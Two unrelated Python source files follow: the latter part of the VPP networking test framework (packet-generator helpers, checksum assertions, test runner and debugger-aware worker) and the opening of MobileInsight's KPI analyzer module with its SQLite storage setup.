if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
vpp_api_trace_log))
except VppTransportSocketIOError:
self.logger.debug("VppTransportSocketIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_capture(cls, intf, worker):
""" Register a capture in the testclass """
# add to the list of captures with current timestamp
cls._captures.append((intf, worker))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
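# Illustrative trace of the parsing above for
# timestr == "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT":
#   timestr.partition(',')      -> head == "Time now 2.190522"
#   head.partition('Time now')  -> tail == " 2.190522"
#   float(tail)                 -> 2.190522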
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls, trace=True):
""" Enable the PG, wait till it is done, then clean up """
for (intf, worker) in cls._old_captures:
intf.rename_previous_capture_file(intf.get_in_path(worker),
intf.in_history_counter)
cls._old_captures = []
if trace:
cls.vapi.cli("clear trace")
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for intf, worker in cls._captures:
cls.vapi.cli('packet-generator delete %s' %
intf.get_cap_name(worker))
cls._old_captures = cls._captures
cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
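# Illustrative usage (Ether/IP/UDP come from scapy.layers and are not imported in this
# module; the packet below is for demonstration only):
#   pkt = Ether() / IP() / UDP() / Raw(load='x')
#   VppTestCase.extend_packet(pkt, 64)
# pads the Raw payload with spaces so that the frame reaches 64 bytes once the 4-byte FCS
# accounted for above is included.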
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = getattr(payload, payload_field).split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
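# Illustrative round trip (not used directly by the framework): info_to_payload() and
# payload_to_info() are inverses over the five numeric fields, e.g.:
#   info = _PacketInfo()
#   info.index, info.src, info.dst, info.ip, info.proto = 7, 1, 2, 4, 17
#   p = Raw(load=VppTestCase.info_to_payload(info))
#   VppTestCase.payload_to_info(p).index   # == 7
# (Raw is scapy.packet.Raw, already imported at the top of this module.)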
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_packet_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics[counter].sum()
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def pg_send(self, intf, pkts, worker=None, trace=True):
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start(trace=trace)
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
self.pg_send(intf, pkts)
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None,
trace=True):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts, worker=worker, trace=trace)
rx = output.get_capture(n_rx)
return rx
def send_and_expect_only(self, intf, pkts, output, timeout=None):
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured()
timeout = 0.1
return rx
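# Illustrative usage (pg0/pg1 are the conventional names of interfaces created via
# create_pg_interfaces() above):
#   rx = self.send_and_expect(self.pg0, pkts, self.pg1)
# sends 'pkts' on pg0, enables capture, starts the packet generator and returns the len(pkts)
# packets captured on pg1; send_and_expect_only() additionally asserts that no other pg
# interface captured anything.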
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = os.getenv('FAILED_DIR')
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0]
test_title_colored = colorize(test_title, GREEN)
if test.is_tagged_run_solo():
# long live PEP-8 and 80 char width limitation...
c = YELLOW
test_title_colored = colorize("SOLO RUN: " + test_title, c)
# This block may overwrite the colorized title above,
# but we want this to stand out and be fixed
if test.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
c = RED
w = "FIXME with VPP workers: "
test_title_colored = colorize(w + test_title, c)
if not hasattr(test.__class__, '_header_printed'):
print(double_line_delim)
print(test_title_colored)
print(double_line_delim)
test.__class__._header_printed = True
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
    A basic test runner implementation which prints results to standard output.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
                self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
                             .format(port=self.testcase.gdbserver_port)] + executable_args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable: '{app}'"
.format(app=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
self.args, shell=False, env=env, preexec_fn=os.setpgrp,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
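# Illustrative sketch, not from the original framework: how the runner and
# result classes above are typically wired together. "MyTestCase" stands in
# for any VppTestCase subclass; the keep-alive/result pipes are omitted here.
#
#   suite = unittest.TestSuite()
#   suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(MyTestCase))
#   runner = VppTestRunner(verbosity=2, print_summary=True)
#   result = runner.run(suite)
#   sys.exit(0 if result.wasSuccessful() else 1)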
|
kpi_analyzer.py
|
#!/usr/bin/python
# Filename: kpi_analyzer.py
"""
kpi_analyzer.py
An abstraction for KPI analyzer
Author: Yuanjie Li
"""
is_android = False
try:
from jnius import autoclass # For Android
try:
from service import mi2app_utils
PythonService = autoclass('org.kivy.android.PythonService')
pyService = PythonService.mService
Context = autoclass('android.content.Context')
ConnectivityManager = pyService.getSystemService(Context.CONNECTIVITY_SERVICE)
except Exception as e:
import main_utils
is_android = True
except Exception as e:
import sqlite3 # Laptop version
is_android = False
__all__ = ["KpiAnalyzer"]
from ..analyzer import *
# from .track_cell_info_analyzer import TrackCellInfoAnalyzer
import os, errno
import urllib.request, urllib.error, urllib.parse, json, time, datetime
import threading
from collections import deque
class KpiAnalyzer(Analyzer):
"""
An abstraction for KPI analyzer. It offers three functions
(1) Helpers to simplify the development of KPI tracking
(2) Automation of the KPI local storage management
(3) Automation of the KPI uploading to KPI map (cloud).
"""
    # Global variables: for asynchronous KPI upload
upload_thread = None
    pending_upload_task = deque([])  # (kpi_name, kpi_value, cur_location) tuples
def __init__(self):
Analyzer.__init__(self)
self.include_analyzer('TrackCellInfoAnalyzer', [])
        # initialize the local database
        self.supported_kpis = {}  # Supported KPIs: kpi_name -> callback
        self.__db = None  # Local database handle (Android) or cursor (laptop)
        self.__conn = None  # sqlite3 connection (laptop version only)
self.__op = ""
self.__phone_model = ""
self.__db_enabled = False
self.__periodicity = {}
self.__logcell = {}
self.__last_updated = {}
# Initialize uploading thread
if is_android and not KpiAnalyzer.upload_thread:
e = threading.Event()
KpiAnalyzer.upload_thread = threading.Thread(target=self.__upload_kpi_thread, args=(e,))
KpiAnalyzer.upload_thread.start()
def __del__(self):
if is_android:
mi2app_utils.detach_thread()
def enable_local_storage(self, enable_storage):
"""
Set if the local KPI should be stored
:param enable_storage: Whether to locally store the kpi. False by default
:type enable_storage: boolean
"""
self.__db_enabled = enable_storage
def register_kpi(self, kpi_type, kpi_name, callback, attributes = None):
"""
Declare a KPI to be supported
:param kpi_type: The type of the KPI (accessibility, retainability, mobility, availability, ...)
:type kpi_type: string
:param kpi_name: The name of the KPI
:type kpi_name: string
        :param callback: The callback used to update the KPI
        :type callback: Python method
        :param attributes: Optional extra attributes (table columns) to store with the KPI
        :type attributes: None or a list of attributes
        :returns: True if the registration succeeds, False otherwise (e.g., the KPI already exists)
        """
full_name = 'KPI.'+kpi_type+'.'+kpi_name
if full_name in self.supported_kpis:
# KPI already exists
return False
self.supported_kpis[full_name] = callback
if not (self.__db and self.__conn):
if not self.__create_db():
self.log_info("Create database failed")
return False
if not self.__create_table(full_name, attributes):
return False
return True
def __create_table(self, kpi_name, attributes):
'''
Create SQL tables for the kpi
:param kpi_name: name of the kpi
:type kpi_name: string
        :param attributes: Optional extra attributes (table columns) for the KPI
        :type attributes: None or a list of attributes
'''
kpi_name = kpi_name.replace('.', '_')
if attributes:
sql_cmd = 'CREATE TABLE IF NOT EXISTS ' + \
kpi_name + "(id integer primary key autoincrement, "
for attribute in attributes:
sql_cmd += (str(attribute) + ' text, ')
sql_cmd += "timestamp timestamp, op text, phone_model text," \
"gps text, cell_id text, tai_id text, dl_freq text, ul_freq text, dl_bw text, ul_bw text," \
"allowed_access text, band_id text)"
else:
sql_cmd = 'CREATE TABLE IF NOT EXISTS ' + \
kpi_name + "(id integer primary key autoincrement, value text, timestamp timestamp, op text, phone_model text," \
"gps text, cell_id text, tai_id text, dl_freq text, ul_freq text, dl_bw text, ul_bw text," \
"allowed_access text, band_id text)"
# print sql_cmd
# for rrc_sr, it may have several types, shall we build a table for each types?
if is_android:
self.__db.execSQL(sql_cmd)
else:
self.__db.execute(sql_cmd)
            self.__conn.commit()
        # signal success to register_kpi(), which checks the return value
        return True
def __create_db(self):
"""
Create a local database for the KPI.
        The database is stored under /sdcard/mobileinsight/dbs/ on Android, or ./dbs/ otherwise
:returns: True if the database is successfully created (or already exists), False otherwise
"""
db_name = "Kpi"
try:
if is_android:
Environment = autoclass("android.os.Environment")
state = Environment.getExternalStorageState()
if not Environment.MEDIA_MOUNTED == state:
self.__db = None
                    return False
sdcard_path = Environment.getExternalStorageDirectory().toString()
DB_PATH = os.path.join(sdcard_path, "mobileinsight/dbs")
activity = autoclass('org.kivy.android.PythonActivity')
if activity.mActivity:
self.__db = activity.mActivity.openOrCreateDatabase(
os.path.join(DB_PATH, db_name + '.db'), 0, None)
else:
service = autoclass('org.kivy.android.PythonService')
self.__db = service.mService.openOrCreateDatabase(
os.path.join(DB_PATH, db_name + '.db'), 0, None)
else:
try:
os.makedirs('./dbs/')
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.__conn = sqlite3.connect('./dbs/' + db_name + '.db')
self.__db = self.__conn.cursor()
return True
except BaseException: # TODO: raise warnings
return False
def list_kpis(self):
"""
Return a list of available KPIs
:returns: a list of string, each of which is a KPI name
"""
return list(self.supported_kpis.keys())
